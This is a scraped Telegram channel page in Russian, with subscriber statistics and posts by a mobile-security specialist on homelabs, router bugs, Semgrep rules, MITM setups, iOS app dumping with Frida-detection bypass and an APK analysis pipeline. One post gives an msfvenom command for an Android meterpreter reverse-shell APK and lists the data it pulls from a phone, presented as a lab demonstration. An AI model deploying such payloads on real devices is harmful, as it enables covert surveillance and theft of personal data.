Дневник Комбеза
Открыть в Telegram
История одного Кибер Безопасника из маленького города в Сибири
БольшеСтрана не указанаКатегория не указана
761
Подписчики
+124 часа
+57 дней
+3030 дней
Загрузка данных...
Похожие каналы
Нет данных
Возникли проблемы? Пожалуйста, обновите страницу или обратитесь к нашему support-менеджеру .
Облако тегов
Входящие и исходящие упоминания
---
---
---
---
---
---
Привлечение подписчиков
сентябрь '26
сентябрь '26
+28
в 0 каналах
август '26
+62
в 0 каналах
Get PRO
июль '26
+79
в 2 каналах
Get PRO
июнь '26
+48
в 1 каналах
Get PRO
май '26
+21
в 0 каналах
Get PRO
апрель '26
+66
в 0 каналах
Get PRO
март '26
+69
в 0 каналах
Get PRO
февраль '26
+28
в 1 каналах
Get PRO
январь '26
+15
в 0 каналах
Get PRO
декабрь '25
+12
в 0 каналах
Get PRO
ноябрь '25
+24
в 0 каналах
Get PRO
октябрь '25
+19
в 2 каналах
Get PRO
сентябрь '25
+194
в 2 каналах
Get PRO
август '250
в 0 каналах
Get PRO
июль '25
+46
в 0 каналах
Get PRO
июнь '250
в 1 каналах
Get PRO
май '25
+148
в 1 каналах
| Дата | Привлечение подписчиков | Упоминания | Каналы | |
| 18 сентября | +1 | |||
| 17 сентября | +2 | |||
| 16 сентября | +2 | |||
| 15 сентября | +2 | |||
| 14 сентября | +1 | |||
| 13 сентября | 0 | |||
| 12 сентября | +1 | |||
| 11 сентября | 0 | |||
| 10 сентября | +10 | |||
| 09 сентября | +3 | |||
| 08 сентября | 0 | |||
| 07 сентября | 0 | |||
| 06 сентября | 0 | |||
| 05 сентября | +3 | |||
| 04 сентября | +2 | |||
| 03 сентября | 0 | |||
| 02 сентября | 0 | |||
| 01 сентября | +1 |
Посты канала
Самохостинг
Почему я считаю self-hosting и подобного рода развлечения одними из самых полезных вещей, которые вы вообще можете придумать.
Во-первых, вы так или иначе поддерживаете и развиваете open source.
Пользуетесь Proxmox, Docker, OpenWrt или другим open-source тулингом — находите баги, репортите их, предлагаете новые фичи, иногда сами что-то допиливаете. Даже просто активное использование таких проектов уже помогает системам жить и развиваться.
Во-вторых, в какой-то момент начинаешь понимать, что за огромное количество сервисов совсем не обязательно постоянно платить.
У меня домашний сервер уже частично заменяет:
— VPS;
— облачное хранилище;
— агентскую инфраструктуру;
— небольшое количество сборщиков;
— всякую мелкую автоматизацию.
В-третьих, у вас появляется настоящая тестовая среда.
Хотите поднять старую Windows и потыкать в ней уязвимости — в добрый путь. Хотите собрать какой-нибудь странный стенд из нескольких виртуалок, прокси, VPN и тестового приложения — пожалуйста. Хотите сломать что-нибудь так, чтобы потом несколько часов разбираться, почему оно вообще работало до этого, — тоже отличный сценарий.Где-то год назад я купил себе мини-ПК на Intel N100 с 16 ГБ RAM и SSD на 512 ГБ. И оказалось, что это одна из самых полезных железок, которые я покупал за последнее время. Я, и не только я, пользуюсь этим ПК практически каждый день. Более того, эта штука довольно часто становится очень полезным помощником непосредственно в работе: быстро поднять стенд, проверить гипотезу, собрать что-нибудь для тестов. Но спустя год N100 и 16 ГБ памяти мне уже становится маловато. Поэтому сейчас думаю над апгрейдом домашнего сервера. Один из вариантов — что-то вроде AOOSTAR WTR PRO с Ryzen 7 5825U, возможностью поставить побольше RAM и несколькими отсеками под диски. Второй вариант — заказать ещё пару миников и постепенно собрать небольшой кластер. Пока думаю🤔 Если у вас дома живёт похожая инфраструктура или есть интересные варианты железа для homelab — буду рад рекомендациям.
| 2 | #рекомендуююзать
Я тут начал использовать новую и на мой взгляд самую удобную тулзу для передачи любых файлов между устройствами.
https://github.com/localsend/localsend
Я использую версию cli и приложения для android/ios работает очень даже хорошо - как по мне сильно удобнее передавать ipa или всякие тестовые файлы | 318 |
| 3 | Mobile Security Ninja 2.0
Итак, почему я молчу в последнее время?
Все дело в том, что мы готовили и проводили очередной поток нашего курса по безопасности мобильных приложений.
Из радостного: в этот раз мы гораздо внимательнее подошли к материалам и практическим заданиям. За все время курса у нас не случилось ни одного технического факапа, хотя в прошлом году они были. Еще мы заметно лучше подготовили докладчиков и заранее протестировали инфраструктуру.
В общем, получилось круто. Спасибо всем, кто принимал участие! ❤️
А мы идем дальше: улучшать и развивать другие направления нашей работы 😎 | 357 |
| 4 | Ладно, React Native не худшее что может быть в мобильной разработке
Мобильные приложения на PHP
https://nativephp.com/
https://developer.vonage.com/en/blog/weird-science-building-android-apps-with-nativephp | 503 |
| 5 | Ну да ) нет ничего хуже php😂 | 483 |
| 6 | Интересный подход к разработке фич у TP-Link
Последнее время мало пишу в канал — рутина немного затянула. Но, чтобы скрасить ожидание, расскажу про мою последнюю неприятную находку в роутерах TP-Link.
История примерно такая: мне тут в руки на тест попал TP-Link Archer BE550, и он наотрез отказывается стабильно работать в режиме, который TP-Link называет «Точка доступа» (Access Point).
Около трёх недель я наблюдал за странностями в сети, и вчера наконец удалось докопаться до одной из причин.
Оказалось, что в режиме точки доступа TP-Link не отключает DHCP-сервер. Более того, почему-то переводит его в режим Auto(хз что этот режим должен делать, но явно не то что он делает сейчас), в котором роутер периодически умудряется выдавать IP-адреса, уже выданные основным роутером.
Результат — вполне себе серьёзные конфликты IP-адресов внутри сети и периодически отваливающиеся устройства.
И вот тут у меня возникает вопрос: как вообще такую жесть удалось пропустить в прод? Особенно учитывая, что у роутера буквально два основных режима работы. Два, Карл.
Короче, в очередной раз убеждаюсь: если хочется нормальный роутер, лучше либо брать что-то с OpenWrt, либо смотреть в сторону MikroTik и других решений от людей, которые хотя бы примерно понимают, что делают 😄
Желаю вам более стабильной сети чем у ребят с tp-link😂 | 758 |
| 7 | Нашей команде удалось побывать на Летней Школе CTF😄
Приключение оказалось достаточно увлекательным и захватывающим: на первой смене мы прошлись по базовым уязвимостям в веб приложениях , а на второй устроили целый мобильный заплыв на почти 3 часа (лекция , практика и CTF).
Спасибо всем кто принимал участие в наших активностях - вы безумно крутые 😎
Отдельное спасибо организаторам - вы делаете лучшие CTF ивенты с огромным удовольствием приедем ещё раз❤️ | 665 |
| 8 | Semgrep Rules
Последнее время мы с командой всё чаще задумывались о том, что mobsfscan в части своего Semgrep-компонента, мягко говоря, местами глючный и довольно ограниченый.
А если попробовать найти достаточно полный набор Semgrep-правил для мобильных приложений, быстро выясняется, что хорошие правила разбросаны по всему необъятному интернету🔞
Поэтому мы решили собрать всё это в одном месте и создали репозиторий:
https://github.com/Sib-Coder/semgrep-mobile-rules
В нём постарались собрать максимально полный набор проверок для мобильных приложений и при этом избавиться от дубликатов.
Будем очень рады вашей поддержке, новым правилам и идеям для развития репозитория.
Давайте делать мобилки безопаснее вместе 😎 | 4 140 |
| 9 | Нет текста... | 0 |
| 10 | Пост для тех кто не боится
Очень часто слышу: «Да что с помощью ваших этих мобилок можно сделать?»
Сегодня практическая работа именно для таких людей.
Вам понадобится:
- телефон;
- Metasploit;
- сеть с нормальной маршрутизацией;
- навыки реверса APK — уровня детского сада достаточно.
Первое, что вам нужно, — сделать APK со зловредным функционалом. Берём Metasploit и вперёд:
bash
msfvenom -p android/meterpreter/reverse_tcp lhost=<сюда пишете IP своего ноута> lport=8888 > $PWD/Downloads/msf.apk
Дальше берёте APK, который у вас получился, и делаете так, чтобы команда adb install сработала: в паре мест патчите полученный APK и подписываете его.
Не привожу полный гайд, чтобы кто попало не начал устраивать слежку за своими одноклассницами. Они и без моей помощи найдут способы для буллинга.
Дальше — msfconsole, запускаем приложение на телефоне.
В результате мы можем наблюдать, что даже при условии, что приложение собрано не под самую новую ОС Android, нам есть что взять с телефона:
- список контактов;
- SMS — даже отправить можно: я так кинул денег другу за шаурму;
- скриншоты;
- доступ к камере;
- ...
Как итог: на мой взгляд, получилась весьма показательная лаба для тех, кто говорит, что из МП ничего сделать нельзя.
Советую повторить данное упражнение со своими коллегами. Ну или хотя бы покажите им этот пост :) | 761 |
| 11 | Традиционное ежегодное мероприятие по получению джеилбрейков объявляется открытым😂 | 548 |
| 12 | Нигде не безопасно.
Из всех "чайников" мы уже знаем, что существует OWASP top 10 для веб-приложений, но многие ли из вас задумывались, есть ли пересечения с мобилками? А задуматься стоит, ведь мобильное приложение - это по сути тот же веб. Собственно, статья про корреляцию уязвимостей на вебе и мобилках и уникальные проблемы, а так же разбор этих уязвимостей в коде и на схемах.
Кто дочитает до конца:
1 - преисполнится
2 - найдёт практический чек-лист
3 - список дополнительной литературы для погружения
#AppSec #Pentest
🧠 Кибер ПТУ | 👨🏫 Менторство ИБ
📂 Другие каналы | 556 |
| 13 | +1 Прочитал книгу «Проект “Феникс”. Роман о том, как DevOps меняет бизнес к лучшему»
Это очень понятная история о том, зачем вообще нужны процессы и почему без них любая команда рано или поздно начинает тонуть в хаосе.
Главная мысль, которую я вынес:
процессы — это не бюрократия ради бюрократии. Нормально построенный процесс помогает команде быстрее двигаться, меньше тушить пожары и лучше понимать, какую ценность она реально приносит бизнесу.
Книга хорошо показывает, что IT существует не само по себе. Любая задача, релиз, багфикс или изменение в инфраструктуре должны быть связаны с бизнес-целями: деньгами, скоростью, надежностью, пользовательским опытом, снижением рисков.
И отдельно мне понравилось, как через сюжет становится понятно, зачем бизнесу нужна команда безопасности.
Безопасность — это не команда, которая приходит в конце и говорит: «Нет, так нельзя».
В идеальном мире безопасность помогает строить процессы так, чтобы продукт развивался быстро, но при этом не создавал критичные риски для компании, клиентов и данных.
Очень советую к прочтению всем кому интересно понять: как моя работа влияет на бизнес... | 885 |
| 14 | Android SELinux Internals Part II: домены, отказы, обходы
Ребята из 8ksec наконец-то выпустили вторую часть серии про SELinux на Android!
Первая часть была про основы: контексты, чтение политик, sepolicy-inject. Вторая уже про то, как это всё работает в реальности.
Разбирается вся цепочка от сертификата подписи APK до SELinux-домена, роль Zygote, как работает installd.
Добавили практики: chcon, runcon, как работает magiskpolicy под капотом, чем принципиально отличаются подходы Magisk, KernelSU и APatch.
Очень сочная и большая статья для любителей мякотки и чтоб погрузиться поглубже в то, как и что устроено внутри.
Ну и анонсированная третья часть обещает быть ещё интереснее: kernel-level техники отключения SELinux и разбор реальных CVE. Что сказать, ждем :)
#Android #SELinux #Pentest #Research #Kernel #Tools | 462 |
| 15 | Сраный Burp…
Самое неприятное в пентесте мобилок — когда приложение не работает из твоей страны, но посмотреть, куда оно ходит и какие API дёргает, всё равно надо.
Мы с коллегой пентестили Flutter-приложение, и мне досталась iOS-часть. А это значит: pinning, сертификаты, прокси, VPN и немного боли.
Сначала собрали схему через Burp:
iPhone → OpenVPN → iptables DNAT → Burp → интернет
Трафик заворачивался, tcpdump показывал, что пакеты доходят, сертификаты подменялись, curl проходил. Но трафик не отображался...
После часа дебага стало понятно: проблема не в OpenVPN, не в iptables и не в маршрутах. Просто Burp опять решил пожить своей жизнью и периодически не прогонял через себя весь трафик.
В итоге переехали на более простую схему:
iPhone → OpenVPN → iptables REDIRECT → mitmproxy → WireGuard → интернет
Поднял mitmweb прямо на OpenVPN-сервере, завернул 80/443 с iPhone локально на 8080, а сам сервер выпустили наружу через wg0.
Понятно что после этого надо было бы похукать пару функций через frida, но в этот раз повезло и разрабы не заморачивались.
Схему, как собрать такое окружение, приложу ниже. Кстати этот метод работает на многих приложениях так как мало кто научился от него нормально защищаться. | 514 |
| 16 | iDump: замена frida-ios-dump без Python (но с блекджеком и обходами)
Если кому-то нужно было когда-нибудь сдампить приложение с iOS трубки, то первое, что приходит на ум - классический frida-ios-dump.
Но с Frida 17+ он сломался и, судя по всему, уже не починится. И вот появился iDump - переосмысление того же подхода, но без всей той боли с pip, зависимостями, правильное версией Python и тд
Автор этого шикарного тула - широко известный в узких кругах @OxFi5t, спасибо ему за это!
Написан на Go с использованием frida-go, и главная идея это автономность. Один самодостаточный бинарь, который уже содержит в себе Frida-агент. Скопировал в PATH и работает. Техника та же, что у оригинала: инжектим агент, патчим cryptid, вытаскиваем расшифрованные сегменты Mach-O, собираем валидный IPA. Только без лишних телодвижений 🤓
Из приятного:
- поддержка батч-дампинга (можно сразу несколько приложений или вообще `--dump-all`)
- фильтрация по bundle ID
- пропуск системных приложений Apple
Передача файлов идёт через Frida messages напрямую — SSH не нужен (хотя SSH/SFTP режим тоже есть, если USB-трансфер медленный).
Отдельно порадовал флаг --dodge - встроенный bypass для приложений, которые детектят Frida и падают до того, как агент успевает что-то сделать. Есть базовый вариант (хукает libc-символы: ptrace, sysctl и тд) и --dodge=advanced для особо упоротых приложений, которые делают raw syscalls и сканируют память на Frida-сигнатуры. Ну и возможность передать свой bypass-скрипт через --early, если встроенные не справляются.
Так что тут можно еще и идеи по обходу джейлбрейка/фриды подсмотреть 😉
Очень рекомендую попробовать. Как по мне, давно нужна была нормальная замена 🔥
#iOS #Frida #ReverseEngineering #Tools #iDump | 446 |
| 17 | Я окончательно перестал играть в CTF.
Причин, наверное, несколько. Последние полгода я постепенно отключался от этого процесса и переключался на вещи, которые сейчас кажутся мне более интересными и полезными.
Для меня CTF всё ещё остаётся офигенным форматом практики. Особенно в обучении: когда мы разрабатываем курсы, тренинги или внутренние соревнования, CTF-задачи отлично помогают закреплять навыки руками.
Но вот участвовать в CTF как игрок на постоянной основе мне больше не хочется.
Проблема не в том, что формат плохой. Проблема в том, что многие соревнования, на мой взгляд, потеряли прежний шарм. Всё чаще игра превращается не в «думай, ломай, проверяй гипотезы», а в распинывание агента.
Да, можно играть без Codex, Claude и всего остального зоопарка AI-инструментов.
Можно.
Но зачем?
Если таски пишутся с помощью ИИ, решаются с помощью ИИ, а эксплойты подбираются за секунды, то игра без ИИ превращается просто в добровольную потерю 80% силы.
А ведь раньше весь кайф CTF был как раз в другом.
Ты сидишь, тупишь, скрипишь мозгами, пробуешь странные идеи, проваливаешься, снова пробуешь — и в какой-то момент сам приходишь к решению. Вот это чувство и было главным.
А сейчас всё чаще выглядит так:
«Codex, тут сайт, походу SSTI вот в этом месте»
Через несколько секунд: готовый эксплойт.
В 2021 году я кайфовал от каждого решённого таска. От каждого маленького продвижения. От момента, когда после нескольких часов тупняка что-то наконец сходилось, и ты такой: «А, вот оно».
Сейчас этого ощущения стало сильно меньше.
Наверное, просто стало неинтересно играть в игру, где всё чаще соревнуются не люди, а их агенты. | 539 |
| 18 | Мой пайплайн по анализу андроид приложений:
Stage 0 — APK Metadata (apk-info):
Мгновенный парсинг (~2мс) манифеста без декомпиляции: пакет, SDK-версии, все permissions, exported-компоненты, подписи (v1/v2/v3), security profile. Уже на этом этапе детектит: debuggable-флаг, v1-only подпись (уязвимость Janus, CVE-2017-13156), привилегированные системные permissions, exported ContentProvider'ы без защиты.
Stage 1 — Декомпиляция + сканирование APK (параллельно):
Всё запускается одновременно:
• JADX — декомпиляция DEX → Java (8 потоков, 60-180с)
• apktool — распаковка ресурсов, AndroidManifest.xml, нативных .so библиотек (5-15с)
• dexfinder — поиск использования скрытых Android API + трассировка цепочек вызовов
• Mariana Trench — taint-анализ потоков данных от Meta (source→sink)
• Trueseeing — Dalvik bytecode scanner
• Автодетект Flutter → Blutter (реверс Dart-кода), React Native → декомпиляция Hermes
Stage 2 — Статический анализ (параллельно):
• 184 regex-правила — быстрый pattern matching по декомпилированным исходникам
• 331 semgrep-правило — AST-анализ (taint tracking, data flow)
• Анализ Blutter pp.txt (Dart-символы для Flutter-приложений)
• dexfinder call chain tracing — трассировка цепочек вызовов от exported-компонентов к уязвимым методам
Stage 3 — Merge + фильтрация + обогащение:
• Дедупликация по (rule_id, file, line)
• SDK-фильтр (732 паттерна) — убирает 98% шума от Google, Firebase, OkHttp, Retrofit и ещё 150+ SDK
• Классификация severity через RoBERTa модель
• Аннотация exported-статуса: кросс-проверка finding → AndroidManifest → dexfinder reachability
• RAG-обогащение каждого finding контекстом из базы знаний
Stage 4 — LLM-анализ (6 агентов параллельно):
Каждый агент — специалист в своей области, получает только релевантные findings + RAG-контекст:
• Agent 1: Manifest + Attack Surface
• Agent 2: Network + TLS
• Agent 3: Auth + Cryptography
• Agent 4: WebView + JS Bridge
• Agent 5: Business Logic
• Agent 6: Native Libraries
• Agent 7 (Judge): валидирует CRITICAL/HIGH от всех агентов, отсекает false positives
RAG Knowledge Base:
• 9675 chunks в ChromaDB (гибридный поиск: BM25 + vector + RRF)
• 1547+ отчётов из 18 источников:
— OWASP MASTG: 120 (тестовые процедуры с примерами кода)
— HackerOne: 170 (реальные bug bounty отчёты с PoC)
— MITRE ATT&CK Mobile: 124 (техники атак, детекция, митигации)
— Security blogs: 207 (Google, Zimperium, Lookout, Check Point)
— Samsung Bulletins: 111 (Samsung-specific CVE)
— NVD: 250 (CVE с CVSS)
— Exploit-DB: 50
— Android Bulletins: 34
— CISA KEV: 23
— Собственные аудиты: 144
— Прочие: arXiv, VulCorpus (94 OWASP Top-10 сэмплов)
• Граф знаний: 5597 узлов, 9213 связей (CVE↔️CWE↔️MITRE↔️MASTG)
• 970+ code snippets в отдельном индексе | 505 |
| 19 | Опять ИИ
Очень классное рассуждение на тему современных трендов связанных с ИИ.
Главный тезис который понравился мне:
статистическое предсказание последовательностей и объяснение мира — не одно и то же. Человеческий интеллект важен не только тем, что продолжает паттерны, но и тем, что различает возможное и невозможное, строит каузальные объяснения и связывает высказывания с истиной, а не только с вероятностью. | 483 |
| 20 | Сила сопротивления - это ты и я...
Не дадим наш любимый андроид в обиду 😎
https://keepandroidopen.org/ru/ | 635 |
